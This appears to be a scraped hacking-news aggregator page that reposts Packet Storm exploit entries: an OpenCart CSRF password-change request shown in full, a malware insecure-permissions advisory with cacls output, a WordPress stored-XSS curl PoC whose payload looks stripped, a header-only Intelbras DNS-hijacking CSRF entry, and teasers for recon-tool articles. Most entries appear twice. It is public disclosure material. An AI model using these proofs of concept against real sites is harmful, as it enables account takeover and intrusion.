Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Intelbras Router RF 301K Cross Site Request Forgery
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Intelbras Router RF 301K with firmware versions 1.1.2 through 1.1.5 suffer from a cross site request forgery vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Intelbras Router RF 301K Cross Site Request Forgery
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Intelbras Router RF 301K with firmware versions 1.1.2 through 1.1.5 suffer from a cross site request forgery vulnerability.
MD5 |
51d204bdd79bd9734467954542910a7bDownload
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
# Date: 01/05/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware 1.1.2-1.1.5
# CVE: 2021-32403
# Exploit Code:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Intelbras Router RF 301K Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
OpenCart 3.0.3.7 Cross Site Request Forgery
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
OpenCart version 3.0.3.7 suffers from a cross site request forgery vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
OpenCart 3.0.3.7 Cross Site Request Forgery
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
OpenCart version 3.0.3.7 suffers from a cross site request forgery vulnerability.
MD5 |
fd3a9e23a636fb12126c970b6b728bdcDownload
# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
# Date : 2021/08/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Tested on: Server : Xampp
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /opencart/index.php?route=account/password HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
Content-Length: 300
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/opencart/index.php?route=account/password
Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
Upgrade-Insecure-Requests: 1
-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="password"
123asd!
-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="confirm"
123asd!
-----------------------------3890527419799841332130342675--
Response
HTTP/1.1 302 Found
Date: Tue, 08 Jun 2021 16:52:59 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
Location: http://127.0.0.1/opencart/index.php?route=account/account
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
Simple Poc to change user Password
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Wuca.nz Insecure Permissions
https://3.bp.blogspot.com/-p2bRUn4ag8U/WWlvPJDaCwI/AAAAAAAAIMw/gkQGiTtaXucRRVbpvBkwiWIbJMO4BFlLwCLcBGAs/s1600/h28.png
Backdoor.Win32.Wuca.nz malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Backdoor.Win32.Wuca.nz Insecure Permissions
https://3.bp.blogspot.com/-p2bRUn4ag8U/WWlvPJDaCwI/AAAAAAAAIMw/gkQGiTtaXucRRVbpvBkwiWIbJMO4BFlLwCLcBGAs/s1600/h28.png
Backdoor.Win32.Wuca.nz malware suffers from an insecure permissions vulnerability.
MD5 |
5d74f82ae3f1b602aa0b456af75385eaDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/378b225b07979e12062f86ab1fbaf2ed.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Wuca.nz
Vulnerability: Insecure Permissions
Description: The malware creates a VBS script "112.vbe" with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 378b225b07979e12062f86ab1fbaf2ed
Vuln ID: MVID-2021-0241
Dropped files: 112.vbe
Disclosure: 06/08/2021
Exploit/PoC:
C:\>cacls 112.vbe
C:\112.vbe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Visitors-App 0.3 Cross Site Scripting
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
WordPress Visitors-App plugin version 0.3 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Visitors-App 0.3 Cross Site Scripting
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
WordPress Visitors-App plugin version 0.3 suffers from a persistent cross site scripting vulnerability.
MD5 |
6a44e77f41ca425ab34453bff4fae337Download
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
# Software Link: https://wordpress.org/plugins/visitors-app/
# Version: 0.3
# Tested on: Debian GNU/Linux 10
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
## Description:
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
# The 'user-agent' parameter allows attacker to escalate their privileges.
## PoC
# Replace google.com with malicious attacker page
curl -i http://localhost/wordpress --user-agent ""
# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Internet Explorer jscript9.dll Memory Corruption
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
There is a vulnerability in jscript9 that could potentially be exploited to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.
MD5 |
Download
Source:packetstormsecurity.com
Internet Explorer jscript9.dll Memory Corruption
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
There is a vulnerability in jscript9 that could potentially be exploited to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.
MD5 |
7bf1477df1aec690e996f9ebbce9b10cDownload
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Ransomware Is Not the Problem
Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.
___________________________
@hacking_Attack
@Hacking_Video
Ransomware Is Not the Problem
Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to discover Universal Plug and Play (UPnP) hosts using Miranda
https://cdn-images-1.medium.com/max/768/1*BiCFS9d-bs-mh843wpgfsA.jpeg
Miranda is a Python-based Universal Plug-n-Play client application intended to discover, query, and connect with UPnP gadgets, especially…
Continue reading on Medium »
How to discover Universal Plug and Play (UPnP) hosts using Miranda
https://cdn-images-1.medium.com/max/768/1*BiCFS9d-bs-mh843wpgfsA.jpeg
Miranda is a Python-based Universal Plug-n-Play client application intended to discover, query, and connect with UPnP gadgets, especially…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Web application reconnaissance using Rocon-ng
https://cdn-images-1.medium.com/max/800/1*9sB_mT7kBiNDy8PYEzGDyA.jpeg
Recon-ng is a full-included Web Reconnaissance system written in Python. Complete with autonomous modules, database association, worked in…
Continue reading on Medium »
Web application reconnaissance using Rocon-ng
https://cdn-images-1.medium.com/max/800/1*9sB_mT7kBiNDy8PYEzGDyA.jpeg
Recon-ng is a full-included Web Reconnaissance system written in Python. Complete with autonomous modules, database association, worked in…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DNS enumeration using domain information groper (Dig)
https://cdn-images-1.medium.com/max/1200/1*Rc8jgBrSCkAkN-lI_07zVg.jpeg
Dig (domain information groper) is a versatile instrument for cross-examining DNS name servers. It performs DNS queries and shows the…
Continue reading on Medium »
DNS enumeration using domain information groper (Dig)
https://cdn-images-1.medium.com/max/1200/1*Rc8jgBrSCkAkN-lI_07zVg.jpeg
Dig (domain information groper) is a versatile instrument for cross-examining DNS name servers. It performs DNS queries and shows the…
Continue reading on Medium »